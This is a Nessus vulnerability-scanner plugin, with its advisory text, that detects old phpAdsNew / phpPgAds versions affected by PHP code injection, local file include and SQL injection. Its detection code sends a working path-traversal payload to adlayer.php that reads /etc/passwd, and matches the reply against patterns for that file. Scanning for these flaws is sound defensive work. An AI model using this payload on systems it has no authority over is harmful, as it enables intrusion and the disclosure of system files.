CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
84.0%
The remote host is running phpAdsNew / phpPgAds, an open source banner ad server.
The version of phpAdsNew / phpPgAds installed on the remote host suffers from several flaws :
Remote PHP Code Injection Vulnerability The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the ‘adxmlrpc.php’ script to be executed within the context of the affected web server user id.
Multiple Local File Include Vulnerabilities The application fails to sanitize user-supplied input to the ‘layerstyle’ parameter of the ‘adlayer.php’ script and the ‘language’ parameter of the ‘admin/js-form.php’ script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files provided PHP’s ‘magic_quotes’ directive is disabled.
SQL Injection Vulnerability An attacker can manipulate SQL queries via input to the ‘clientid’ parameter of the ‘libraries/lib-view-direct.inc.php’ script.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration section: when the scanner loads the plugin with
# 'description' set, only the metadata below is collected and the
# detection logic further down is never reached.
if (description) {
script_id(19518);
script_version("1.24");
# Three CVEs cover the three flaw classes listed in the description
# (PHP code injection, local file include, SQL injection).
script_cve_id("CVE-2005-2498", "CVE-2005-2635", "CVE-2005-2636");
script_bugtraq_id(
14560,
14583,
14588,
14584,
14591
);
script_name(english:"phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities." );
# nb: "phpAdsNews" in the report text below reads like a typo for
# phpAdsNew; it is user-facing report text and is left untouched here.
script_set_attribute(attribute:"description", value:
"The remote host is running phpAdsNew / phpPgAds, an open source banner
ad server.
The version of phpAdsNews / phpPgAds installed on the remote host
suffers from several flaws :
- Remote PHP Code Injection Vulnerability
The XML-RPC library bundled with the application allows
an attacker to inject arbitrary PHP code via the
'adxmlrpc.php' script to be executed within the context
of the affected web server user id.
- Multiple Local File Include Vulnerabilities
The application fails to sanitize user-supplied input to
the 'layerstyle' parameter of the 'adlayer.php' script
and the 'language' parameter of the 'admin/js-form.php'
script before using them to include PHP files for
execution. An attacker can exploit these issues to read
arbitrary local files provided PHP's 'magic_quotes'
directive is disabled.
- SQL Injection Vulnerability
An attacker can manipulate SQL queries via input to the
'clientid' parameter of the
'libraries/lib-view-direct.inc.php' script." );
script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_152005.67.html" );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/408423/30/120/threaded" );
script_set_attribute(attribute:"solution", value:
"Upgrade to phpAdsNew / phpPgAds 2.0.6 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
# Exploitability metadata as published with the plugin; the detection
# below only sends a single crafted GET request, no exploit tooling.
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/29");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/15");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpadsnew:phpadsnew");
script_end_attributes();
summary["english"] = "Checks for multiple vulnerabilities in phpAdsNew / phpPgAds < 2.0.6";
script_summary(english:summary["english"]);
# ACT_ATTACK: the check actively sends a traversal payload to the target
# rather than relying on a version banner, so it runs in the attack phase.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
# Needs the HTTP service fingerprint first; honours the global switch that
# disables CGI scanning and only runs where PHP has been detected.
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Detection: for each known CGI directory, request adlayer.php with a
# traversal value in 'layerstyle' and look for evidence that the local
# file include fired (passwd contents) or was at least attempted (PHP
# warning naming the traversal path).
foreach cgi_dir (cgi_dirs()) {
  probe = string(
    cgi_dir, "/adlayer.php?",
    "layerstyle=../../../../../../../etc/passwd%00"
  );
  reply = http_send_recv3(method:"GET", item:probe, port:port);

  # No reply at all means the web server stopped answering; the whole
  # plugin stops here instead of moving on to the next directory.
  if (isnull(reply)) exit(0);
  body = reply[2];

  # Direct evidence: a root account line from the included passwd file.
  hit = egrep(string:body, pattern:"root:.*:0:[01]:");

  # Indirect evidence: PHP reported it could not open the traversal path.
  # nb: this suggests magic_quotes_gpc was enabled (the null byte never
  # reached the include), but the other flaws would still be present.
  if (!hit) hit = egrep(string:body, pattern:"Warning.+main\(.+/etc/passwd.+failed to open stream");
  if (!hit) hit = egrep(string:body, pattern:"Fatal error.+ Failed opening required '.+/etc/passwd");

  if (hit) {
    security_hole(port);
    # NOTE(review): what was demonstrated above is a local file include,
    # but the KB marker written is the SQL-injection one; presumably it is
    # meant to tag the whole vulnerable release for downstream plugins —
    # confirm that intent before relying on this key elsewhere.
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    exit(0);
  }
}